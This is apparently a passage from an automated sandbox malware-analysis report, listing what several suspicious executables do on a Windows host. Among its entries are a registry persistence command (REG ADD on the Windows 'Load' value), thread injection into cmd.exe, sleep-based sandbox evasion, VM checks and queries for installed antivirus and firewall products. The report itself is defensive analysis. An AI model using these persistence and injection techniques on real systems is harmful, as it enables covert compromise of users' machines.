      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeThread delayed: delay time: 922337203685477
      Source: C:\ProgramData\images.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 662
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWindow / User API: threadDelayed 6638
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWindow / User API: threadDelayed 2297
      Source: C:\ProgramData\images.exeDropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe TID: 1064Thread sleep time: -42849s >= -30000s
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe TID: 5728Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe TID: 2528Thread sleep count: 70 > 30
      Source: C:\ProgramData\images.exe TID: 5560Thread sleep time: -46689s >= -30000s
      Source: C:\ProgramData\images.exe TID: 4840Thread sleep time: -922337203685477s >= -30000s
      Source: C:\ProgramData\images.exe TID: 3448Thread sleep count: 70 > 30
      Source: C:\Windows\SysWOW64\cmd.exe TID: 5036Thread sleep count: 662 > 30
      Source: C:\Windows\SysWOW64\cmd.exe TID: 5036Thread sleep time: -7944000s >= -30000s
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe TID: 992Thread sleep time: -38920s >= -30000s
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe TID: 4784Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe TID: 1320Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 2736Thread sleep time: -46806s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 720Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00411446 FindFirstFileW,FindNextFileW,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeThread delayed: delay time: 42849
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeThread delayed: delay time: 922337203685477
      Source: C:\ProgramData\images.exeThread delayed: delay time: 46689
      Source: C:\ProgramData\images.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeThread delayed: delay time: 38920
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 46806
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: images.exe, 00000016.00000002.474849931.0000000000E2B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWHh
      Source: images.exe, 00000016.00000002.474949211.0000000000E50000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oyGG
      Source: reg.exe, 0000000B.00000002.252269957.0000000002E30000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.483465858.0000000006DD0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: images.exe, 00000016.00000002.474949211.0000000000E50000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
      Source: images.exe, 00000016.00000002.475068084.0000000000E83000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:OO3
      Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: reg.exe, 0000000B.00000002.252269957.0000000002E30000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.483465858.0000000006DD0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: reg.exe, 0000000B.00000002.252269957.0000000002E30000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.483465858.0000000006DD0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: Xjf4yH9N2t.exe, 00000007.00000003.251342778.0000000000FDE000.00000004.00000001.sdmp, images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: images.exe, 00000016.00000002.475068084.0000000000E83000.00000004.00000020.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
      Source: reg.exe, 0000000B.00000002.252269957.0000000002E30000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.483465858.0000000006DD0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Windows\system32\drivers\tsusbhub.sysSystem information queried: ModuleInformation
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00426222 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0041EB27 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00411B38 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00411B3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00411E6D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 24_2_001F001A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00406045 GetProcessHeap,RtlAllocateHeap,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess token adjusted: Debug
      Source: C:\ProgramData\images.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess token adjusted: Debug
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Allocates memory in foreign processesShow sources
      Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 1F0000 protect: page execute and read and write
      Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 660000 protect: page read and write
      Contains functionality to inject threads in other processesShow sources
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
      Creates a thread in another existing process (thread injection)Show sources
      Source: C:\ProgramData\images.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 1F010E
      Writes to foreign memory regionsShow sources
      Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 1F0000
      Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 660000
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeProcess created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
      Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
      Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe 'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe'
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeProcess created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,
      Source: images.exe, 00000016.00000002.474949211.0000000000E50000.00000004.00000020.sdmpBinary or memory string: Program Manager
      Source: KetqqsbuJ.exe, 00000028.00000002.479588850.00000000030AE000.00000004.00000001.sdmpBinary or memory string: Program ManagerH
      Source: images.exe, 00000016.00000002.475259759.0000000001490000.00000002.00000001.sdmp, cmd.exe, 00000018.00000002.476330186.0000000003400000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.478630114.0000000002EA3000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmpBinary or memory string: GetProgmanWindow
      Source: images.exe, 00000016.00000002.475259759.0000000001490000.00000002.00000001.sdmp, cmd.exe, 00000018.00000002.476330186.0000000003400000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.475765757.00000000014D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: images.exe, 00000016.00000002.475259759.0000000001490000.00000002.00000001.sdmp, cmd.exe, 00000018.00000002.476330186.0000000003400000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.475765757.00000000014D0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: KetqqsbuJ.exe, 00000028.00000002.483732291.00000000074EC000.00000004.00000001.sdmpBinary or memory string: Program Manager@@x
      Source: KetqqsbuJ.exe, 00000028.00000002.482420960.0000000005C1A000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager
      Source: KetqqsbuJ.exe, 00000028.00000002.483706311.00000000073AC000.00000004.00000001.sdmpBinary or memory string: ulProgram Manager
      Source: images.exe, 00000016.00000002.475259759.0000000001490000.00000002.00000001.sdmp, cmd.exe, 00000018.00000002.476330186.0000000003400000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.475765757.00000000014D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: KetqqsbuJ.exe, 00000028.00000002.482674777.000000000609B000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager
      Source: images.exe, 00000016.00000002.480389563.0000000003E0E000.00000004.00000001.sdmpBinary or memory string: RProgram Manager%
      Source: images.exe, 00000016.00000002.472620170.0000000000559000.00000040.00000001.sdmpBinary or memory string: C:\Users\user\AppData\Local\Microsoft Vision\02-08-2021_10.17.46{Program Manager}
      Source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmpBinary or memory string: SetProgmanWindow
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00410E5E cpuid
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeQueries volume information: C:\Users\user\Desktop\Xjf4yH9N2t.exe VolumeInformation
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\ProgramData\images.exeQueries volume information: C:\ProgramData\images.exe VolumeInformation
      Source: C:\ProgramData\images.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\ProgramData\images.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\ProgramData\images.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\ProgramData\images.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings:

      barindex
      Increases the number of concurrent connection per server for Internet ExplorerShow sources
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
